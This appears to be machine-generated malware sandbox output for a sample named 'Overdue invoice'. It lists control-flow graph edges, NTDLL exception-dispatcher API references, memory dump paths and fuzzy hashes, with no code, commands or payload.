                                                                          control_flow_graph 697 64e7536-64e759a 838 64e759a call 6c6914b 697->838 839 64e759a call 6c69158 697->839 704 64e75a0-64e7628 840 64e7628 call 6c69657 704->840 841 64e7628 call 6c69660 704->841 710 64e762e-64e766f 842 64e766f call 6c69823 710->842 843 64e766f call 6c69828 710->843 713 64e7675-64e76b6 832 64e76b6 call 6c6a423 713->832 833 64e76b6 call 6c6a430 713->833 834 64e76b6 call 6c6a42b 713->834 716 64e76bc-64e76fd 835 64e76fd call 6c6a860 716->835 836 64e76fd call 6c6a85b 716->836 837 64e76fd call 6c6a8e9 716->837 719 64e7703-64e816e KiUserExceptionDispatcher * 2 830 64e8175-64e81ad 719->830 832->716 833->716 834->716 835->719 836->719 837->719 838->704 839->704 840->710 841->710 842->713 843->713
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 8d32e7cc3ac7796b49458261dbb8b89af9e09d76afdd3720c36f1ad5029c12dd
                                                                          • Instruction ID: 4ec01f91180293eacd3b5b9d65a307a97fc62089af07c5554ac9cbab52b1489d
                                                                          • Opcode Fuzzy Hash: 8d32e7cc3ac7796b49458261dbb8b89af9e09d76afdd3720c36f1ad5029c12dd
                                                                          • Instruction Fuzzy Hash: E8021B39902398CFCB65DF20D8886A9B7B2FF4971AF6041DAE90A57340DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 844 64e757d-64e759a 986 64e759a call 6c6914b 844->986 987 64e759a call 6c69158 844->987 848 64e75a0-64e7628 976 64e7628 call 6c69657 848->976 977 64e7628 call 6c69660 848->977 854 64e762e-64e766f 978 64e766f call 6c69823 854->978 979 64e766f call 6c69828 854->979 857 64e7675-64e76b6 980 64e76b6 call 6c6a423 857->980 981 64e76b6 call 6c6a430 857->981 982 64e76b6 call 6c6a42b 857->982 860 64e76bc-64e76fd 983 64e76fd call 6c6a860 860->983 984 64e76fd call 6c6a85b 860->984 985 64e76fd call 6c6a8e9 860->985 863 64e7703-64e816e KiUserExceptionDispatcher * 2 974 64e8175-64e81ad 863->974 976->854 977->854 978->857 979->857 980->860 981->860 982->860 983->863 984->863 985->863 986->848 987->848
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 253a5ebd94a607d5ce275403ebc1ae3c0cf7dd09dc6eb59277f969de3f5008f0
                                                                          • Instruction ID: f8491e5c3d1622c4a44e8b99b7ed99997e6064911ae83d3f7c3759b86d032306
                                                                          • Opcode Fuzzy Hash: 253a5ebd94a607d5ce275403ebc1ae3c0cf7dd09dc6eb59277f969de3f5008f0
                                                                          • Instruction Fuzzy Hash: D9F10A39902398CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 988 64e75bb-64e7628 1125 64e7628 call 6c69657 988->1125 1126 64e7628 call 6c69660 988->1126 995 64e762e-64e766f 1117 64e766f call 6c69823 995->1117 1118 64e766f call 6c69828 995->1118 998 64e7675-64e76b6 1119 64e76b6 call 6c6a423 998->1119 1120 64e76b6 call 6c6a430 998->1120 1121 64e76b6 call 6c6a42b 998->1121 1001 64e76bc-64e76fd 1122 64e76fd call 6c6a860 1001->1122 1123 64e76fd call 6c6a85b 1001->1123 1124 64e76fd call 6c6a8e9 1001->1124 1004 64e7703-64e816e KiUserExceptionDispatcher * 2 1115 64e8175-64e81ad 1004->1115 1117->998 1118->998 1119->1001 1120->1001 1121->1001 1122->1004 1123->1004 1124->1004 1125->995 1126->995
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 5eed9d894212c565d9c02e3fb4f975b3dcab15457769a1d41595818e8432a7b2
                                                                          • Instruction ID: fcac7ade2c900a65d0bfc76b4057b2c3d9ae1737bdb89067e498df0e0e7d2499
                                                                          • Opcode Fuzzy Hash: 5eed9d894212c565d9c02e3fb4f975b3dcab15457769a1d41595818e8432a7b2
                                                                          • Instruction Fuzzy Hash: B4F1FB39902398CFCBA5DF20D8886A9B7B2FF4571AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1127 64e7602-64e7628 1253 64e7628 call 6c69657 1127->1253 1254 64e7628 call 6c69660 1127->1254 1131 64e762e-64e766f 1255 64e766f call 6c69823 1131->1255 1256 64e766f call 6c69828 1131->1256 1134 64e7675-64e76b6 1257 64e76b6 call 6c6a423 1134->1257 1258 64e76b6 call 6c6a430 1134->1258 1259 64e76b6 call 6c6a42b 1134->1259 1137 64e76bc-64e76fd 1260 64e76fd call 6c6a860 1137->1260 1261 64e76fd call 6c6a85b 1137->1261 1262 64e76fd call 6c6a8e9 1137->1262 1140 64e7703-64e816e KiUserExceptionDispatcher * 2 1251 64e8175-64e81ad 1140->1251 1253->1131 1254->1131 1255->1134 1256->1134 1257->1137 1258->1137 1259->1137 1260->1140 1261->1140 1262->1140
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 3d49211392786cd5029f2ec97f007066519fa967531754f90ca4acda0629f0b7
                                                                          • Instruction ID: 980577548e42bad3136959c0301e3c4280bc32d92b1874fde320806a1fdb3e13
                                                                          • Opcode Fuzzy Hash: 3d49211392786cd5029f2ec97f007066519fa967531754f90ca4acda0629f0b7
                                                                          • Instruction Fuzzy Hash: B0F1FA39902398CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1263 64e7649-64e766f 1386 64e766f call 6c69823 1263->1386 1387 64e766f call 6c69828 1263->1387 1267 64e7675-64e76b6 1388 64e76b6 call 6c6a423 1267->1388 1389 64e76b6 call 6c6a430 1267->1389 1390 64e76b6 call 6c6a42b 1267->1390 1270 64e76bc-64e76fd 1391 64e76fd call 6c6a860 1270->1391 1392 64e76fd call 6c6a85b 1270->1392 1393 64e76fd call 6c6a8e9 1270->1393 1273 64e7703-64e816e KiUserExceptionDispatcher * 2 1384 64e8175-64e81ad 1273->1384 1386->1267 1387->1267 1388->1270 1389->1270 1390->1270 1391->1273 1392->1273 1393->1273
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: ddba0dc1bed6548713104a301eef06f867f8e5dbcf5d9d4efbe1a224ed35e710
                                                                          • Instruction ID: 1c7a2e72541b397efb9e7cf44dbe78a89f8da877d4c86ccc7e5b577ad4434bc6
                                                                          • Opcode Fuzzy Hash: ddba0dc1bed6548713104a301eef06f867f8e5dbcf5d9d4efbe1a224ed35e710
                                                                          • Instruction Fuzzy Hash: CAF1FC39902398CFCB65DF20D8886A9B7B2FF4971AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1394 64e7690-64e76b6 1514 64e76b6 call 6c6a423 1394->1514 1515 64e76b6 call 6c6a430 1394->1515 1516 64e76b6 call 6c6a42b 1394->1516 1398 64e76bc-64e76fd 1517 64e76fd call 6c6a860 1398->1517 1518 64e76fd call 6c6a85b 1398->1518 1519 64e76fd call 6c6a8e9 1398->1519 1401 64e7703-64e816e KiUserExceptionDispatcher * 2 1512 64e8175-64e81ad 1401->1512 1514->1398 1515->1398 1516->1398 1517->1401 1518->1401 1519->1401
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: cccf28d805b4df09f0ace98b8b5f8d05279e52646eef8887ffa22dfa6ce842b9
                                                                          • Instruction ID: 4e34e1521c7207b593c0fb9ed1aff4faf5dad019e4b2886708aaa8a23e5bcca2
                                                                          • Opcode Fuzzy Hash: cccf28d805b4df09f0ace98b8b5f8d05279e52646eef8887ffa22dfa6ce842b9
                                                                          • Instruction Fuzzy Hash: 58E10C39902258CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1520 64e76d7-64e76fd 1637 64e76fd call 6c6a860 1520->1637 1638 64e76fd call 6c6a85b 1520->1638 1639 64e76fd call 6c6a8e9 1520->1639 1524 64e7703-64e816e KiUserExceptionDispatcher * 2 1635 64e8175-64e81ad 1524->1635 1637->1524 1638->1524 1639->1524
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 58e640a81e6365525f6846f96f200549b007b8c84a99b1b48256735183378354
                                                                          • Instruction ID: a2fce6930553036865b3ed870997d5e6b22c5f35af9f3a6abfe1d23d70920588
                                                                          • Opcode Fuzzy Hash: 58e640a81e6365525f6846f96f200549b007b8c84a99b1b48256735183378354
                                                                          • Instruction Fuzzy Hash: EEE10B39902258CFDB65EF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1640 64e771e-64e816e KiUserExceptionDispatcher * 2 1752 64e8175-64e81ad 1640->1752
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 94b7a5d89200d1e6337211c0b15dc71649bdecb44ac95c7a67fe860710dcae32
                                                                          • Instruction ID: 227957513b88d326094dcf1c6755bcd95367fc68d49b2ae6d975a89d7d34cc50
                                                                          • Opcode Fuzzy Hash: 94b7a5d89200d1e6337211c0b15dc71649bdecb44ac95c7a67fe860710dcae32
                                                                          • Instruction Fuzzy Hash: 6FE10C39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1754 64e7765-64e816e KiUserExceptionDispatcher * 2 1863 64e8175-64e81ad 1754->1863
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 233b6714286a54466dcb8c9f768e2551e8dc68f833c32db7c5cb47e8641e5334
                                                                          • Instruction ID: 6d4f12a3d09317d28948627dfd25e739338189ca7d5fb2ee0764f521730c81a5
                                                                          • Opcode Fuzzy Hash: 233b6714286a54466dcb8c9f768e2551e8dc68f833c32db7c5cb47e8641e5334
                                                                          • Instruction Fuzzy Hash: 00E1FB39902298CFDB65DF20D8886A9B7B2FF4970AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed). Basic-block edge list:
                                                                          control_flow_graph 1865 64e77ac-64e816e KiUserExceptionDispatcher * 2 1971 64e8175-64e81ad 1865->1971
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 0d82aad5ee31bae57f18fd1acfaef25b62f8b86ae6db704105311723dabd72ed
                                                                          • Instruction ID: bacb8747aa4c12b34e16632d8ca33059c63c52b0b68ae9f9a8bc3c97a18b7b9a
                                                                          • Opcode Fuzzy Hash: 0d82aad5ee31bae57f18fd1acfaef25b62f8b86ae6db704105311723dabd72ed
                                                                          • Instruction Fuzzy Hash: 13D10C39902298CFCB65DF20D8886ADB7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 6b2809b979890f6d276db787e23b89d3b21b89907c3ad4bf07e24f568f6e8276
                                                                          • Instruction ID: 77a9bac5f0102794e07cc72f2ce593fbe42ebe03d7005126812afbf659d8bf46
                                                                          • Opcode Fuzzy Hash: 6b2809b979890f6d276db787e23b89d3b21b89907c3ad4bf07e24f568f6e8276
                                                                          • Instruction Fuzzy Hash: 6FD10B39902298CFCB65DF20D8886ADB7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 374b16abdf81bcb1bafcc8e17c2fad583d6a9feb9c3ea4907eb9ef4509e6ef3a
                                                                          • Instruction ID: 2e601372d2c99577ce41dc22162f98ad5ab51d57ab48c9f8d04b03b5edbd2b54
                                                                          • Opcode Fuzzy Hash: 374b16abdf81bcb1bafcc8e17c2fad583d6a9feb9c3ea4907eb9ef4509e6ef3a
                                                                          • Instruction Fuzzy Hash: 53D1EA39902298CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2fdf3479ddc1aa93a425bb6cda61b6ba44cb51e381448e46df65cb3343ef2cc3
                                                                          • Instruction ID: 4a01b0d8ae44eaaaef0e84c920bd4ce8f83f0576c92839e92da120488c632ebb
                                                                          • Opcode Fuzzy Hash: 2fdf3479ddc1aa93a425bb6cda61b6ba44cb51e381448e46df65cb3343ef2cc3
                                                                          • Instruction Fuzzy Hash: 18C1EA39902398CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2c03e0b47bd9417c74e7b77e0860a6917dedee03b4a28363f13d3301cd4f4a93
                                                                          • Instruction ID: 0b67f1d2e310089af8382d9fe31184587a988bbd7497e08bee02f5157bc6da7c
                                                                          • Opcode Fuzzy Hash: 2c03e0b47bd9417c74e7b77e0860a6917dedee03b4a28363f13d3301cd4f4a93
                                                                          • Instruction Fuzzy Hash: 60C1EA39902398CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 08acc68067214f27af25a5925f8c1f980ddea7392834d7f6b0b1f2f531f7e8aa
                                                                          • Instruction ID: e782e356c54d270934099c9f43feb8089ad7c836fc71bf1d4065fb9788bc0ec4
                                                                          • Opcode Fuzzy Hash: 08acc68067214f27af25a5925f8c1f980ddea7392834d7f6b0b1f2f531f7e8aa
                                                                          • Instruction Fuzzy Hash: C7C1FB39902398CFDBA5DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 4b05e010114e6eb6029a0846ad7eb4910691803b72dc5aaa71074447de3dc527
                                                                          • Instruction ID: 58cffb08a98221c171af0e14241c5f8706460d5c13ae1a18308b9613bdd7cd7c
                                                                          • Opcode Fuzzy Hash: 4b05e010114e6eb6029a0846ad7eb4910691803b72dc5aaa71074447de3dc527
                                                                          • Instruction Fuzzy Hash: 3FB1DB39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 75a525129e582614bab745b1fbb701d7a34e5e5a0ba9683e039d2c1c7b8a6b46
                                                                          • Instruction ID: 6742b6077dfb6b2f598abca30dcdbb7bee27a126491d0f473e26dabf8f92686d
                                                                          • Opcode Fuzzy Hash: 75a525129e582614bab745b1fbb701d7a34e5e5a0ba9683e039d2c1c7b8a6b46
                                                                          • Instruction Fuzzy Hash: 49B1DB39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: b7602deffad2f962d21fb3090ca91d6619d597a636a340881c81721af0182918
                                                                          • Instruction ID: 8c44da29e3036e3d337b4faf8de1ef008e5120f0c1ccc40dcd21600a6fc10f47
                                                                          • Opcode Fuzzy Hash: b7602deffad2f962d21fb3090ca91d6619d597a636a340881c81721af0182918
                                                                          • Instruction Fuzzy Hash: E8B1FB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 743183450e328093c5d915d26a25da6073b0e9114efba53c4ffb9739e8c7b929
                                                                          • Instruction ID: 8dc574d384892803c44f7eba71e9aa6061edf1709f8eeb8bdf31da681706a06a
                                                                          • Opcode Fuzzy Hash: 743183450e328093c5d915d26a25da6073b0e9114efba53c4ffb9739e8c7b929
                                                                          • Instruction Fuzzy Hash: D9A1FC39902298CFDBA5DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: ead2421514d0a6ae2662f0849d0860f392944106b5cfec8f18f240688f579bd0
                                                                          • Instruction ID: f9992a92fd5e541494a816e422ad7aa1a71594ba5ace4a190579ed2829e2c97b
                                                                          • Opcode Fuzzy Hash: ead2421514d0a6ae2662f0849d0860f392944106b5cfec8f18f240688f579bd0
                                                                          • Instruction Fuzzy Hash: A5A1EB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90AA7340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 02473c793d59bcc3f68d589af497a600810c652a62d552404393e494c45f3a35
                                                                          • Instruction ID: 63a3f7368a3fe5c01b8b7a2b15a8785cf3e752220621c6ee94f3e62dbeb43d2e
                                                                          • Opcode Fuzzy Hash: 02473c793d59bcc3f68d589af497a600810c652a62d552404393e494c45f3a35
                                                                          • Instruction Fuzzy Hash: 9D91EB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: bb2c5165963bc4c8a4408f38673429edb0b795cd3fd6a07936d023ce8fb432ef
                                                                          • Instruction ID: 0ae658f5741127b1acee34215d4df58a0a8156d3a44e4942b90d60d6a04e6327
                                                                          • Opcode Fuzzy Hash: bb2c5165963bc4c8a4408f38673429edb0b795cd3fd6a07936d023ce8fb432ef
                                                                          • Instruction Fuzzy Hash: F091EB39902258CFCB65DF30D8886A9B7B2FF4570AF6041DAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
